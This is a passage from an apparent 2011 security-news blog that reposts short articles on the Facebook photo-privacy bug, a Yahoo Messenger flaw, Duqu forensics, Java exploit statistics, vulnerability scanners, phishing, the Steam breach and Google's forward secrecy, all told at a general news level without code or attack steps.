      Opposition groups argue that the early morning timing of the attack was carefully designed to disrupt the voting of young commuters, who are more likely to vote for opposition (liberal) candidates. They want to force a parliamentary audit or special prosecutor’s investigation if the police investigation fails to get to the bottom of the attack.

       Gong continues to protest his innocence, a factor that has led opposition politicians to speculate that he is covering up for higher-ranking officials who ordered the attack.
Democratic Party politician Baek Won-woo told The HankYoreh: “We need to determine quickly and precisely whether there was someone up the line who ordered the attack, and whether there was compensation.”

Hackers :Facebook security hole exposes Mark Zuckerberg's privates !!!

2011-12-07T19:05:00.001Z

A security error on Facebook Social Network has been exposing private pictures of countless users, including the Facebook's founder and CEO Mark Zuckerberg.

A photo pilfering exploit posted to bodybuilding.com forum on Monday included step-by-step instructions for viewing pictures designated as private by the Facebook users who posted them. It worked by manipulating a feature that allows people to report inappropriate profile pictures to Facebook officials. The routine allowed snitches to report additional pictures, even when designations made the images off-limits to all but a select set of friends.

Not all the participants in the forum reported success. It would appear that those located in the US got better results than others. Several hours after the disclosure vulnerability was reported, 13 images purportedly lifted from Zuckerberg's account were posted below a headline that read: “It's time to fix those security flaws Facebook...”

They show Zuck wining and dining with friends, chatting with President Barack Obama, and holding what appears to be a freshly slaughtered chicken, in keeping with a recent predilection to eat only meat he has killed himself.
In a statement, Facebook officials said:

Earlier today, we discovered a bug in one of our reporting flows that allows people to report multiple instances of inappropriate content simultaneously. The bug allowed anyone to view a limited number of another user's most recently uploaded photos irrespective of the privacy settings for these photos. This was the result of one of our recent code pushes and was live for a limited period of time. Upon discovering the bug, we immediately disabled the system, and will only return functionality once we can confirm the bug has been fixed. The privacy of our user's data is a top priority for us, and we invest significant resources in protecting our site and the people who use it. We hire the most qualified and highly-skilled engineers and security professionals at Facebook, and with the recent launch of our Security Bug Bounty Program (http://www.facebook.com/whitehat/ ), we continue to work with the industry to identify and resolve legitimate threats to help us keep the site safe and secure for everyone.

It's not the first time someone has figured out how to bypass Facebook permissions designed to give users tight control over who gets to see images and announcements posted to their pages. In 2008, a Canadian computer technician was able to view private photos of Paris Hilton, Zuckerberg, and others by guessing the ID of the photo. Last year, the social network was caught exposing the name and photo of all 500 million of its users when their email addresses were typed in to the log-in page.

Monday's discovery of yet another hole in Facebook's safety net is the latest reminder that the only way to be sure something doesn't get published to world+dog is to keep it off the internet in the first place. Permission systems such as those on Facebook and other sites may make users feel better, but they have little effect on hackers with enough determination or time on their hands.

Yahoo! Zero-day(0day)! status! updates! exploit! hijacks!

2011-12-03T21:08:00.001Z

New unpatched flaw in yahoo is causing trouble for thier client and thier users!!

Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user's status message.

Hijacked status updates are a handy way to persuade a victim's contacts to click on a link and lead them to a dangerous website. Worse still, the bug in version 11.x of the Messenger client requires minimal user interaction to work, unlike previous exploits that relied on coning prospective marks.

The attacker sends a supposed file to a target that is actually an iframe that swaps the status message for the attacker's customised text, as explained in a blog post by net security firm BitDefender here. The message might be, and in most attack scenarios would be, sent firm outside a targeted user's contact list.

    If successfully executed, a victim will have no indication that his or her status message has been rewritten. The ruse might be used to gain affiliate incomes by promoting dodgy sites as well as directing users towards sites loaded with exploits or scareware scams.

     Bitdefender said it has notified Yahoo about the vulnerability. Attacks based on the as yet unfixed flaw have already been detected in the wild, the Romanian security firm warns.

    It advises users to change the setting of their IM client to “ignore anyone who is not in your Yahoo! Contacts" (which is off by default) as a precaution pending the release of a patch. In addition, some security suites include a web filter function that ought to defend users from this attack.

Duqu attackers: Linux rookies, master coders, Amateurs Mistakes

2011-12-02T15:50:00.001Z

The malware attack that've been targeted many companies, including Iran's nuclear program. Speculation. so what is this malware attack ?

The Duqu* malware that targeted industrial manufacturers around the world may have been spawned by a well-funded team of competent coders, but their command of Linux led to some highly amateur mistakes.

According to a report published on Wednesday by researchers from Kaspersky Lab, the unknown attackers attempted a global cleanup on a dozen or more hacked Linux servers they used to control systems infected with Duqu. The mass purge on machines running CentOS 5.x came on October 20, two days after researchers publicly compared Duqu to the Stuxnet worm that sabotaged Iran's nuclear program. Speculation is the operators were trying to cover their tracks.

In their haste, the attackers appear to have made some critical mistakes. Servers in Vietnam and Germany contained partial logs of the hackers' SSH and bash sessions that remained on the / partition.

“This was kind of unexpected and it is an excellent lesson about Linux and the ext3 file system internals,” Kaspersky researcher Vitaly Kamluk wrote. “Deleting a file doesn't mean there are no traces or parts, sometimes from the past. The reason for this is that Linux constantly reallocates commonly used files to reduce fragmentation.”

The sshd.log files show the attackers logging into the Vietnam-based machine in July and in October just prior to mass purge. The Germany-based system also showed evidence of being accessed on November 23, 2009 and the user receiving error messages indicating that attempts to redirect traffic on ports 80 and 443 had failed. The breadcrumbs may have been few, but they were enough to show that the servers weren't true command and control channels, but rather proxies designed to conceal the attackers' true origin.
Using similar techniques, the Kaspersky researchers unearthed evidence that every hacked server had its OpenSSH 4.3 application upgraded to version 5.8. A recovered bash history on the machine in Germany also showed the attackers needed refreshers in basic Linux administration. At one point, they referenced the sshd_config manual, and at another juncture, they needed to check documentation for the Linux ftp client. They also botched the command line syntax for the Linux iptables.

The attackers also left behind traces of changes they made to the sshd-config file. One of them speeds up port directions over tunnels, which is simple enough change to understand. The other enabled Kerberos authentication. The Kaspersky researchers still aren't sure what the motive is for the latter modification.
So far, the researchers say, they've analyzed only a fraction of compromised servers, which among other places, were located in Singapore, Switzerland, the UK, the Netherlands, Belgium, and South Korea. It will be interesting to see what evidence they're able to exhume from additional machines. In the meantime they're hoping Linux admins can help them ponder a few questions, including:

Why the preoccupation with updating OpenSSH 4.3 to version 5.8 as soon as a machine had been commandeered?

and

Is there any relationship between the updates and the modification to “GSSAPIAuthentication yes” made to the sshd-config file?

“We hope that through cooperation and working together we can cast more light on this huge mystery of the Duqu trojan,” Kamluk wrote. Tipsters can reach his team at “stopduqu AT Kaspersky DOT com.”

(* Duqu : Duqu is a malicious computer virus that is designed to gather intelligence data from entities such as industrial control manufacturers in order to be able to launch a future attack on an industrial control facility.)

Source : The Register.

Nearly half of the attacks exploit vulnerabilities in Java default updates !!

2011-12-01T21:30:00.001Z

         Nearly half of the attacks exploit vulnerabilities in Java default updates, according to the Microsoft Security Intelligence Report.
        The exploits against computer security in the first half of 2011 were largely associated with the vulnerabilities of the family of Java products, technology maintained by Oracle.
    The report Security Intelligence of Microsoft said indeed a record: one-third to half of the exploits are due to flaws in the runtime environment (JRE) Virtual Machine (JVM) and the JDK.

      Oracle does not unduly slow to offer patches, the problem lies in their spread, diagnostic Tim Rains, director of Trustworthy Computing at Microsoft.
     "Many of the faults most commonly used Java is old, and had had security updates for years." Thus, the solutions used by the attackers are long, because the attackers who develop, or redeem kits hackers continue to get a positive return on investment, observes Tim Rains.
      For example, the most exploited vulnerability (CVE-2010-0840, affecting the JRE) was revised in March 2010 and waited until the last quarter of that year to gain popularity among malicious hackers.
     The problem is further exacerbated as often, several major versions of the runtime language coexist on the same machine (based solutions that require their presence).
The report from Microsoft based on the number of exploits arrested by the anti-malware solution, blocked with 27.5 million of attacks over the past 12 months.

     If Tim Rains prefers to emphasize the need for updates to users and sysadmins, Chester Wisniewski of Sophos will immediately advise to switch to Java: "Most people do not use Java nowadays and it [does not install Java] reduces the attack surface from the Internet, "says he.

     *Download The rapport

Source : Blog officiel de la sécurité Microsoft.

Predispose Your Security Risks Part 2

2011-11-29T22:43:00.001Z

As you discovred on the Predispose PART 1, the perpose of using the scanner in the companies is avoiding the hack of thier systms. Please complete reading this Chapter II off Predispose Your Security Risks.

Passive Aggressive :

Vulnerability scanners come as either passive or active devices, each of which have their advantages and disadvantages. Passive scanners are monitoring devices that work by sniffing the traffic that goes over the network between systems, looking for anything out of the ordinary. Their advantage is that they have no impact on the operation of the network and so can work 24 x 7 if necessary, but they can miss vulnerabilities particularly on more quiet parts of a network.

Active scanners probe systems in much the way hackers would, looking for weaknesses through the responses devices make to the traffic the scanners send to them. They are more aggressive and in some ways more thorough than passive scanners, but they can cause service disruptions and crash servers.

Many people see the two as complementary and recommend using passive and active scanners alongside each other. The passive scanners can provide the more continuous monitoring, while active scanners can be used periodically to flush out the cannier vulnerabilities.

Software vs. Hardware :

The scanners can also come as either software-based agents placed directly on servers or workstations, or as hardware devices. Host-based scanners can use up processor cycles on the system, but are generally considered more flexible in the kinds of vulnerabilities they can scan. The network-based scanners are plug-and-play hardware devices that are self-contained and need less maintenance than software agents.

The focus of vulnerabilities has been changing over the past several years. On the one hand, organizations have become savvier about protecting their networks and systems, and hackers have had a harder time penetrating those defenses. At the same time, as Web-based services have become the lifeblood of many witnesses, hackers have found a goldmine of potential exploits.

That’s because Web traffic flows back and forth primarily through Port 80 on a network, which has to be kept open if those Web-bases services are to be available to a company’s customers and business partners.

It’s a hard to defend weak spot in enterprise defenses, and once hackers gain access to Web applications they can use them to get information from databases, retrieve files from root directories, or use a Web server to send malicious content in a Web page to unsuspecting users.

Interpreting the Results :

Vulnerability scanning works with Web applications by launching simulated attacks against those applications and then reports the vulnerabilities it finds with recommendations on how to fix or eliminate them.

However, as powerful an addition as vulnerability scanning can be to the overall security of an enterprise, some observers advise caution in interpreting those results.

Kevin Beaver, an independent security consultant with Atlanta-based Principal Logic, LLC, says it takes a combination of the vulnerability scanner and a human knowledge of the network and context in which the scans were carried out to accurately interpret the results.

Left to themselves, he says, scanners will tend to spit information that their vendors think is important. What’s also needed is an understanding of what was being tested at the time, how it was being tested, why the vulnerability is exploitable and so on. That will show whether vulnerabilities flagged as high priority actually are important in a particular user’s environment, and therefore whether it’s worthwhile putting in the effort to remediate them.

You absolutely need vulnerability scanners, Beaver said, because they take a lot of the pain out of security assessments.

“But you cannot rely on them completely,” he said. “A good tool plus the human context is the best equation for success.”

I hop you'll Find it purposive Like i did.

Predispose Your Security Risks Part 1

2011-11-29T22:22:00.001Z

Vulnerability scanning got its start as a tool for the Hackers (Bad guys); now it's helping companies to do penetrate test thier systems.

For something that can be such an effective weapon against "Hackers", it’s ironic that vulnerability scanning got its start as a tool for the Them (Hackers). Before they can get into networks, hackers need to know where the most vulnerable spots are in an enterprise’s security. That means using scanning tools to trawl for such things as open network ports or poorly secured applications and operating systems.

In the past few years these intentions have been turned around, to where scanning tools now give the guys in the white hats (ethical* hackers) a good idea of where the vulnerabilities are and a chance to repair them before the crackers get there. At least they provide the potential for that. The fact is, many companies don’t seem to be taking advantage of these tools or if they do have them, they are not making much use of them. Gartner Research believes as many as 85% of the network attacks that successfully penetrate network defenses are made through vulnerabilities for which patches and fixes have already been released.

Illimite Exploits :

Now there is the rapidly expanding universe of Web based applications for hackers to exploit. A recent study by security vendor Acunetix claimed that as many as 70% of the 3,200 corporate and non-commercial organization Web sites its free Web based scanner has examined since January 2006, contained serious vulnerabilities and were at immediate risk of being hacked. A total of 210,000 vulnerabilities were found, the company said, for an average of some 66 vulnerabilities per web site ranging from potentially serious ones such as SQL injections and cross-site scripting, to relatively minor ones such as easily available directory listings. “Companies, governments and universities are bound by law to protect our data,” said Kevin Vella, vice president of sales and operations at Acunetix. “Yet web application security is, at best, overlooked as a fad.”

Patch Patrol :

Vulnerability scanners seek out known weaknesses, using databases that are constantly updated by vendors to track down devices and systems on the network that are open to attack. They look for such things as unsafe code, misconfigured systems, malware and patches and updates that should be there but aren’t.

They also have several plus factors. They can be used to do a “pre-scan” scan, for example, to determine what devices and systems there are on the network. There’s nothing so vulnerable as something no-one knew was there in the first place, and it’s surprising how often those turn up in large and sprawling enterprises.

Many scanners can also be set to scan the network after patches have been installed to make sure they do what they are supposed to do. What vulnerability scanners can’t do is the kind of active blocking defense carried out by such things as firewalls, intrusion prevention systems and anti-malware products though, by working in combination with them, vulnerability scanners can make what they do more accurate and precise.

Please stay and complete your reading in the second part above.

*: Ethical Hackers or White Hat Hackers are people who are indeed Hackers but they give thier abilities for good causes (e.g : helping other companies, ...etc).

Google Goes After Impersonator Scammers

2011-11-27T17:10:00.001Z

As huge corporations go, Google's a pretty cuddly one, but according to the search giant itself, everyone should be careful about offers of employment or wealth that involve its name. "Google Money" scammers represent a growing problem that the company is trying to combat.

Google Goes After Impersonator Scammers

A post on the Official Google Blog announced today, "[D]espite hundreds of consumer complaints and our own efforts to keep these sites from tricking people, some scams continue. To fight back, we're working to stop various fraudulent 'Google Money' schemes, and this week filed suit against Pacific WebWorks and several other unnamed defendants."

The post then added, "[W]e're still working constantly to remove scammy URLs from our index, and we'll permanently disable AdWords accounts that provide a poor or harmful user experience, whether or not they use Google's trademarks illegally."

The problem continues to exist, though.

So fair warning: The scams are known to operate under names like the Earn Google Cash Kit, Google Adwork, Google ATM, Google Biz Kit, Google Cash, Google Fortune, Google Marketing Kit, Google Profits, Google StartUp Kit, Google Works, and the Home Business Kit for Google. From there, they tend to be fairly standard make-money-from home affairs.

As always, stay sharp.

Facebook Becomes A Favorite Target Of Phishers

2011-11-27T17:08:00.001Z

Due to widespread concerns about its thoughts on users' privacy, Facebook has been under all sorts of fire lately, facing criticism from U.S. senators, European data protection authorities, and many tech experts. Now, yet another problem's cropped up, as Facebook's been called a top target of phishers.

Facebook Becomes A Favorite Target Of Phishers

The Securelist division of Kaspersky Labs issued a report yesterday, and the identities of the top three organizations that have been targeted by phishers may not come as a surprise to anyone; they're PayPal (with 52.2 percent of all attacks aimed at it), eBay (with 13.3 percent), and HSBC (with 7.8 percent).

The report, which covered the period between January and March of this year, next stated, though, "Facebook popped up unexpectedly in fourth place. This was the first time since we started monitoring that attacks on a social networking site have been so prolific."

By way of explanation, the report then continued, "Having stolen users' accounts, the fraudsters can then use them to distribute spam, sending bulk emails to the account owners and their friends in the network. This method of distributing spam allows huge audiences to be reached. Additionally, it lets the fraudsters take advantage of the social networking sites' additional options, like being able to send different requests, links to photo's and invitations, all with the advertisement attached, both within the network and to users' inboxes."

Obviously, this isn't good news for Facebook's users or the security community as a whole. Facebook acts as a sort of point of entry to information about a whole lot of people (the social network had 400 million users in early February).

This isn't good news for Facebook, either, though - nothing that makes its users uncomfortable or unhappy, and therefore likely to leave, is - so perhaps we'll at least see the company make some attempt(s) to address this problem.

Anyway, if you're curious, the list of phishers' targets picked up after Facebook with Google, the IRS, Rapidshare, Bank of America, UBI, and Bradesco.

Online Game Service Steam Gets Hacked!

2011-11-27T17:05:00.001Z

Valve corporation, make of many popular game series' such as Half-Life, Team Fortress and Portal, had its popular video game on-demand service hacked on November 6th, although it is not yet known whether they all were taken or not . Apparently an outrageous 35 million possibly had their personal information compromised in the attack. According to the BBC, "The attackers used login details from the forum hack to access a database that held ID and credit card data" which could now be used for any number of purposes. Valve issued a statement letting users know the extent of the situation:

Online Game Service Steam Gets Hacked!

"We learned that intruders obtained access to a Steam database in addition to the forums. This database contained information including user names, hashed and salted passwords, game purchases, email addresses, billing addresses and encrypted credit card information. We do not have evidence that encrypted credit card numbers or personally identifying information were taken by the intruders, or that the protection on credit card numbers or passwords was cracked. We are still investigating."

Adding this as well:

"We don't have evidence of credit card misuse at this time. Nonetheless you should watch your credit card activity and statements closely."

They alerted customers that they will have to change their forum passwords the next time they login, and suggested that they change their Steam passwords (which are apparently separate) as well. This is not a great time for this to happen to Steam, as many high profile titles such as Modern Warfare 3 and The Elder Scrolls: Skyrim, have come out this week, and this may make users a bit more wary about using the service now and in the future.

Facebook Gets Hacked!

2011-11-27T17:02:00.001Z

Recently Facebook, headed up by billionaire entrepreneur Mark Zuckerberg, was hacked and violent, pornographic photos were posted on millions of users profiles.

Facebook Gets Hacked!

Apparently, this attack did not actually compromise any user data, but at the same time, that does not mean it wasn't serious. With over 800 million active users, Facebook is responsible for protecting a lot of personal data. Currently, the company is blaming the attack on a flaw in certain browsers. Apparently, users were tricked by the hacker(s) into inserting malicious javascript code into their address bars which granted the hacker(s) access to their profiles.

Obviously the people at Facebook aren't just sitting around not doing anything about this. According to a spokesperson for the company, "Protecting the people who use Facebook from spam and malicious content is a top priority for us, and we are always working to improve our systems to isolate and remove material that violates our terms," which is somewhat relieving. However, many are still surprised and upset that this happened in the first place.

What the public needs to understand is that Facebook is not the only major company out there that has been hacked recently. Sony, Valve, Google, Lockheed Martin, and others have all been victim to major attacks in the past few months. Facebook is trying their best to control the situation and is advising its members not to enter anything into their address bar that they don't know is safe.

Security Manager's Journal: Sensitive company data gets released into the wild

2011-11-27T14:21:00.001Z

Computerworld - If you don't think it's a big challenge to protect sensitive company information and intellectual property, listen to this story

Last week, one of our sales associates visited a customer to review the road map for one of our flagship products. This discussion was to be confidential, so you can imagine the sales associate's consternation when the customer said he had already viewed the presentation on the Web.
He simply searched SlideShare.net, an online community for sharing presentations, and found ours. Access wasn't restricted (though restricting it is an option), so he was able to download it and have a look -- ignoring the "Restricted Use Only" label slapped across it.

The uproar that this situation created reached me quickly, and I was asked to remove the file from SlideShare.

One difficulty with that request was that only the user who uploaded the file could remove it, and that user had uploaded it anonymously, so I couldn't just send him an email and tell him to take it down. I might have been able to get his attention by blogging about the problem, but then we would've been advertising our misstep to the public. I contacted SlideShare and asked that the file be removed, but like most social media and file-sharing sites, it wouldn't act on a request from a third party, even though that third party was the security guy at the company that created the presentation. That left legal action as our last resort; our legal department filed a request through the Digital Millennium Copyright Act.
Because I am a security guy, this turn of events didn't come as a great surprise. Things like this are inevitable in an era of proliferating social media and cloud-based data sharing and storage. I've denied several requests to use the cloud to store corporate data -- I'm not satisfied with the security these services offer -- but reports generated from our firewall show widespread use of these technologies.

Two options

This event, as well as other situations that arise because it's so easy for users to move things to the cloud on their own, can be handled internally in two ways: administratively and technologically.
Administratively, I suggested that the vice president of sales tell his team that whoever uploaded the file must remove it, because it put the organization at risk. I also suggested that our vice president of marketing and public affairs or our legal counsel send a stern message to the entire workforce, stressing the importance of obtaining approval from marketing or public affairs before releasing any nonpublic data to the Internet. Luckily, I've already included these scenarios in a mandatory security awareness training module I recently released.
Technologically, I don't have much to work with, given our current budget and resource constraints, but I will enable URL content filtering rules on our new Palo Alto Networks firewalls to block access to any personal storage sites, with appropriate exceptions. I know that doing this will have a business impact, since certain departments use these sites to disseminate training materials and marketing and sales information to the public. It will take quite a bit of time to minimize the business impact.
The other issue with URL filtering is that it isn't in effect when an employee goes off our network. Of course, laptops can be configured to force all network traffic over a VPN, and software can push URL content filtering rules to each laptop, but those are the sorts of things we can't afford to do. I have data leak prevention in my budget for 2012, and that will help prevent nonpublic data from leaving the company.
But without solid technical controls, we will have to rely on stern words and employees' sense of responsibility.
This week's journal is written by a real security manager, "Mathias Thurman," whose name and employer have been disguised for obvious reasons. Contact him at mathias_thurman@yahoo.com.

Four rising threats from cybercriminals

2011-11-27T14:14:00.001Z

Computerworld - Criminal hackers never sleep, it seems. Just when you think you've battened down the hatches and fully safeguarded yourself or your business from electronic security risks, along comes a new exploit to keep you up at night. It might be an SMS text message with a malevolent payload or an errant signal designed to jam GPS receivers.

Whether you're protecting corporate data or simply trying to keep your personal files safe, these threats -- some rapidly growing, others still emerging -- put your systems at risk. Fortunately, security procedures and tools are available to help you win the fight.

1. Text-message malware

While smartphone viruses are still fairly rare, text-message attacks are becoming more common, according to Rodney Joffe, senior vice president and senior technologist at mobile messaging company Neustar and director of the Conficker Working Group, a coalition of security researchers that came together to fight the malware known as Conficker. PCs are fairly well protected today, he says, so some black-hat hackers are now targeting mobile devices. Their incentive is mostly financial: Text messaging provides a way to break into devices and make money.
Khoi Nguyen, group product manager for mobile security at Symantec, confirmed that text-message attacks aimed at smartphone operating systems are commonplace now that people are increasingly reliant on mobile devices. It's not just consumers who are at risk, he adds. Any employee who falls for a text-message ruse using a company smartphone can jeopardize the business's network and data and possibly cause a compliance violation.
"This is a similar type of attack as [is used on] a computer -- an SMS or MMS message that includes an attachment, disguised as a funny or sexy picture, which asks the user to open it," Nguyen explains. "Once they download the picture, it will install malware on the device. Once loaded, it would acquire access privileges, and it spreads through contacts on the phone, [who] would then get a message from that user."
In this way, says Joffe, hackers create botnets for sending text-message spam with links to a product the hacker is selling, usually charging you per message. In some cases, he adds, the malware even starts buying ring tones that are charged on your wireless bill, lining the pockets of the hacker selling the ring tones.
Wireless carriers say they do try to stave off the attacks. For instance, Verizon spokeswoman Brenda Raney says the company scans for known malware attacks, isolates them on the cellular network, and even works with federal crime units to block them.
To keep such malware off users' phones, Joffe recommends that businesses institute strict corporate policies limiting whom employees can text using company networks and phones, and what kind of work can be done via text messaging. Another option is a policy that prohibits text messaging entirely, at least until the industry figures out how to deal with the threats

2. Hacking into smart grids

A common misconception is that only open networks -- say, corporate wireless LANs that visitors may use -- are hackable. Not true, says Justin Morehouse, a principal consultant at Stratum Security who spoke about network security at last year's DefCon hacker convention. Morehouse says it's actually not that difficult to find an access point for a so-called closed system.
Some nuclear plants and power grids have wireless networks that are vulnerable to attack. And supervisory control and data acquisition (SCADA) systems aren't safe either.
For example, the Stuxnet worm last year infected tens of thousands of Windows PCs running Siemens SCADA systems in manufacturing and utility companies, most notably in Iran. It was largely spread via infected USB flash drives. "Stuxnet proved that it is relatively simple to cause potentially catastrophic damage" to an industrial control network, says Neustar's Joffe.
According to Morehouse, another new attack point will be smart grids that use electronic metering to streamline power management. Utility companies around the world have begun testing and rolling out smart grids to homes and businesses. The technology, which can send data to and receive it from a central system, can also be very helpful for IT: You can open a console to see the power usage for one section of a building, for example.
But smart grids might be vulnerable to attacks that would allow nefarious hackers to cut off electricity at homes and businesses and wreak other kinds of havoc. One possible attack vector is a smart grid's communications infrastructure. For example, Morehouse says, a German utility company called Yello Strom uses a consumer smart grid system that works like a home automation kit -- the sensors report energy usage back to the central server via the user's home Wi-Fi network.
The most effective preventive measure, says Morehouse, is rigid isolation -- a smart grid should not touch any other network. Given the dangers that can arise if a hacker gains access to a smart grid, he says, companies should conduct penetration tests and make sure that firewalls in closed networks are secure. He advises using tools such as Core Impact and Metasploit.

3. Social network account spoofing

Users of Facebook, LinkedIn and other social networks are vulnerable to attacks that rely on account spoofing. A scammer poses as either someone you know or a friend of a friend, in order to fool you into revealing personal information. He then uses that information to gain access to your other accounts and eventually steal your identity.
In a typical exploit, says Joffe, someone contacts you on a site like Facebook or LinkedIn, pretending to be a friend of a friend or a co-worker of someone you trust. Then, this new "friend" contacts you directly through text message or email. The correspondence seems legitimate because you believe he has a connection with an individual you trust.
In another scenario, a scammer might impersonate someone you already know -- claiming to be an old friend from high school, for instance. Spoofers can find out your connections by following your public feeds or looking up the names of co-workers on sites like LinkedIn, where you've posted your work information.
Once the scammer has established a connection with you, he uses devious means to steal personal data, such as chatting online to find out the names of your family members, favorite bands, hobbies and other seemingly innocuous information. Then he uses that information to try to guess your passwords or answers to security questions for banking sites, webmail accounts or other online services.
Morehouse describes another type of attack that targets companies as well as individuals. The spoofer might set up a Facebook page that claims to be the official company page for, say, a major retailer. The spoofer might claim that the page is a formal method to contact the company or register complaints.
The page might offer fake coupons to entice people to join, and it soon goes viral as people share it with their friends. Once hundreds or thousands of users have joined the page, says Morehouse, the owner tricks them into giving out personal information, perhaps by signing up for additional coupons or special offers.
This ends up being a double attack: Consumers are harmed because their personal data is compromised, and the company is harmed because its customers now associate the fake Facebook page with the real company -- and decide not to buy from that company anymore.
Joffe says there is no way to prevent a criminal from setting up a fake Facebook page, but companies can use monitoring tools such as Social Mention to see how the company name is being used online. If an unauthorized page turns up, companies can ask the social network to remove the fake listing.

4. GPS jamming: Threat or nuisance?

An emerging criminal tactic -- interfering with GPS signals -- has security experts divided on just how harmful it could become.
Jamming a GPS signal at the source is next to impossible, says Phil Lieberman, founder of enterprise security vendor Lieberman Software. Blocking the radio signals that are broadcast from orbiting GPS satellites would require a massive countertransmission. And because the satellites are operated by the U.S. military, jamming them would be considered an act of war and a federal crime, says Lieberman.
However, it is easy to jam GPS receivers using low-cost jamming devices like one sold by Brando. The devices jam a receiver by overloading it with a signal that's similar to the real GPS signal. The receiver then becomes confused because it can't find a steady satellite transmission.

Lieberman doesn't give much credence to fears about jammers disrupting airplanes or air traffic control systems, because those networks use a completely different GPS signal from the one we use in cars and handheld devices. Jamming could, however, be a potentially dangerous issue when it comes to financial records, he says, because GPS devices are used in the banking industry to add time stamps to financial transactions. Although completely blocking transactions would be difficult, Lieberman says, an industrious hacker could theoretically disrupt transactions and cause headaches for banks.
Security expert Roger Johnston, a systems engineer at the Argonne National Laboratory in Chicago, says spoofing GPS signals is the greater danger, explaining that GPS receivers are low-power devices that latch on to any strong signal. He says spoofing could be used for serious crimes -- tricking a delivery truck driver into turning down a dark alley, changing the time stamps on financial transactions, delaying emergency vehicles from finding their routes. There have been no reported cases of GPS spoofing to commit a criminal act, but Johnston warns that the government and businesses should work to deter such attacks.
Taking some extra precautions -- using strong encryption technology, engaging only with trusted friends on social networks, and using penetration testing software on corporate networks -- can alleviate some fears and help you sleep at night, even if the bad guys keep coming up with new exploits.
Brandon is a former IT manager at a Fortune 100 company who now writes about technology. He's written more than 2,500 articles in the past 10 years. Follow his tweets at @jmbrandonbb.
This version of this story was originally published in Computerworld's print edition. It was adapted from an article that appeared earlier on Computerworld.com.

Shock: Council dumps data wad - doesn't break any laws

2011-11-27T03:09:00.001Z

Surrey county council has launched a website which brings together a wide range of information on the area.
Named Surrey-i, the local authority said that the website will provide residents with data on issues such as roads covered by gritting trucks in severe winter weather, care homes offering places for the elderly and crime rates on local streets.

Peter Martin, deputy leader of the council, told GGC that the local authority holds large amounts of information and that it was right to share it with residents.

"It's all about transparency. We want to make as much information available to the public as they want. So for example, if you've just moved to Surrey you'll be able to see where the nearest schools are and so on," he said. "In a sense it's like a Wikipedia for Surrey."
The website has a built-in map, and by entering their postcode residents can find services and facilities in their community. These include the nearest schools and libraries, as well as information on local doctors, hospitals, charities and councillors. Other features will allow people to find their closest railway station, bus stop, dentist or beauty spot.
The site was soft launched in September on a restricted basis, but is now fully available to everyone. Martin said that the project is ongoing and will continue to evolve. He revealed that if there is an appetite for it, people may be able to have the service as an app on their mobile phones in future.
"But we're just at the experimental stage at the moment, so we'll monitor and track what people say about the service," he added.
Martin said that people trying to provide services in the area will also find the tool useful as there will be data for businesses to access, such as workforce skills, the county's economic performance and the success start-ups.
The site was developed by the council on behalf of the Surrey strategic partnership, which includes the local authority, borough and district councils, the Surrey County Association of Parish Town Councils, Surrey police, NHS Surrey and the voluntary and business sectors. As part of the launch, the council is also tweeting a fact an hour from the website during this week.
Surrey council said that other public bodies like the health service and police are already using the website to help them plan more integrated services and target their resources better. The council is currently using the website as part of a review of buildings which aims to make sure they continue to be in the right location to provide the best services for residents.
This article was originally published at Guardian Government Computing.

Google protects HTTPS-enabled services against future attacks

2011-11-27T02:02:00.001Z

IDG News Service - Google has modified the encryption method used by its HTTPS-enabled services including Gmail, Docs and Google+, in order to prevent current traffic from being decrypted in the future when technological advances make this possible.

The majority of today's HTTPS implementations use a private key known only by the domain owner to generate session keys that are subsequently used to encrypt traffic between the servers and their clients.
This approach exposes the connections to so-called retrospective decryption attacks. "In ten years time, when computers are much faster, an adversary could break the server private key and retrospectively decrypt today's email traffic," explained Adam Langley, a member of Google's security team, in a blog post.
In order to mitigate this relatively low, but real security risk, Google has implemented an encryption property known as forward secrecy, which involves using different private keys to encrypt sessions and deleting them after a period of time.
In this way, an attacker who manages to break or steal a single key won't be able to recover a significant quantity of email traffic that spans months of activity, Langley said. In fact, he pointed out that not even the server admin will be able to decrypt HTTPS traffic retroactively.
Because SSL wasn't designed to support key exchange mechanisms capable of forward secrecy by default, the Google engineers had to design an extension for the popular OpenSSL toolkit. This was integrated into OpenSSL 1.0.1, which has yet to be released as a stable version.
The new Google HTTPS implementation uses ECDHE_RSA for key exchange and the RC4_128 cipher for encryption. Unfortunately, this combination is only supported in Firefox and Chrome at the moment, which means that HTTPS connections on Internet Explorer will not benefit from the added security.
This isn't necessarily a problem with Internet Explorer, which does support a combination of EDH (Ephemeral Diffie--Hellman) key exchange and RC4. EDH also provides forward secrecy, but Google chose ECDHE (Elliptic curve Diffie--Hellman) instead for performance reasons.
The company plans to add support for IE in the future and hopes that its example will encourage other service providers that use HTTPS to implement forward secrecy so that one day it can become the norm for online traffic encryption.